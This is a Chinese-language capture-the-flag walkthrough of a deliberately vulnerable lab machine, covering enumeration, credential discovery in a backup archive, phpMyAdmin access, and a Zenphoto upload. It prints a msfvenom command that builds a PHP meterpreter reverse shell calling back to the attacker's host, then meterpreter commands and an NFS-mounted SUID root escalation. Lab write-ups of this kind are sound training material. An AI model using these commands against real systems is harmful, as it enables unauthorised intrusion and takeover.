前言
各位朋友，今天我們將要挑戰的是由Mr. Viper為vulnerable hub設計的“ORCUS”奪旗挑戰賽。本次挑戰賽中包含了4部分：
獲取Shell
獲取root權限
獲取flag
自由發揮尋找隱藏flag
下載傳送門 SHA-256 : 79B1D93C60E664D70D8EB3C0CDF1AD98BF2B95036C84F87EEF065FA71C1AE51E
探索頻道
192.168.0.151是我們目前已知的目標IP，收集目標信息的第一步就需要進行枚舉，因此使用慣用手法使用nmap掃描其版本。 
nmap -p- -sV 192.168.0.151
從截圖中你可以看出目標開放了許多端口，但我們現在只需要關注80端口就好。 

得知目標開放80端口，因此我們通過瀏覽器打開目標IP 192.168.0.151，但是沒有收獲。 

為了不浪費寶貴時間，我選擇了另一款名為dirb的工具對目錄進行暴力破解。在終端鍵入如下命令： 
dirb http://192.168.0.151
ok大方向正確，并且我們挖出了許多目錄。特別是注意下面截圖中我高亮標注的backups目錄，接下來我們就看看該目錄有沒有驚喜。 

在瀏覽器中鍵入192.168.0.151/backups，其中我發現一個名為simple PHP Quiz-backup.tar.gz的tar文件。下載保存到本地，以供后面分析

解壓后發現其中包含php和html文件，我的小眼睛一瞄，名為db-conn.php的文件其中會不會有數據庫相關的東西呢？ 

做了許多努力，最后發現dbuser，dbpasswords分別為數據庫的用戶名和密碼。 

在此之前我們就挖到很多目錄，如果你返回前面截圖還可以注意到phpmyadmin目錄。接著我們在瀏覽器中鍵入192.168.0.1.51/phpmyadmin，鍵入上一步獲得數據庫用戶名以及密碼 

正確輸入用戶名密碼，進入phpmyadmin管理頁面。其中發現名為zenphoto的數據庫，進去瞧瞧吧。 

在zenphoto數據庫中發現一個設置頁面可用于更新數據庫配置文件，在文本框區域填入我們的信息。 

此處，我們填入數據庫用戶名dbuser和數據庫密碼dbpassword，其他直接默認就好 

當點擊頁面下端的GO按鈕便開始安裝，在安裝完成之后會要求你設置管理員賬戶及密碼 

單擊繼續按鈕，同意給出服務條款

創建管理員用戶就不過多敘述，之后點擊頁面頂部的應用按鈕就好。

使用創建的管理員賬戶登錄zenphoto數據庫，進入管理控制臺之后我們可以選擇上傳圖片，但這里我們僅上傳zip文件 

鍵入以下命令，使用msfvenom生成惡意PHP腳本： 

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw
從截圖你可以看到生成的惡意PHP腳本，此刻我們需要復制高亮標注的部分代碼。之后將其粘貼到文本文檔，保存為shell.php。最后新建一個文件夾，將shell.php放入其中，然后將其進行壓縮。 最重要的是記得開啟metasploit中的multi handler 

回到瀏覽器以上傳我們的zip文件，之后探尋192.168.0.151/zenphoto/albums內的信息。從下面的截圖中可以看出我們成功上傳shell.php 

單擊shell.php，我們獲得metasploit內的meterpreter會話，鍵入以下命令獲取flag： 
Meterpreter >cd /var/www
Meterpreter >ls
Meterpreter >cat flag.txt
獲得第一個flag 

經過不懈努力，我在kippo文件夾中進一步發現許多信息 
Meterpreter >pwd
Meterpreter >cd ..
Meterpreter >cat etc/kippo/data/userdb.txt
獲得第二個flag 

接下來獲取root權限，在文本文檔中引用https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary 中的內容。 之后將其另存為raj.c

上傳編譯好的raj.c文件獲取root權限，如下圖 
Meterpreter >upload/root/Desktop/raj.c
Meterpreter >shell
gcc -o raj raj.c

從nmap的掃描結果中我們知道目標ip的nfs端口已開放，利用這個點我們可以在Kali Linux中抓取其掛載的tmp數據 
mount -t nfs 192.168.0.151:/tmp mount
Chown root: root raj
Chmod u+s raj

./raj
Id
Cd /root
Cat flag.txt
獲得第三個flag

最后就靠你自由發揮找到其他flag咯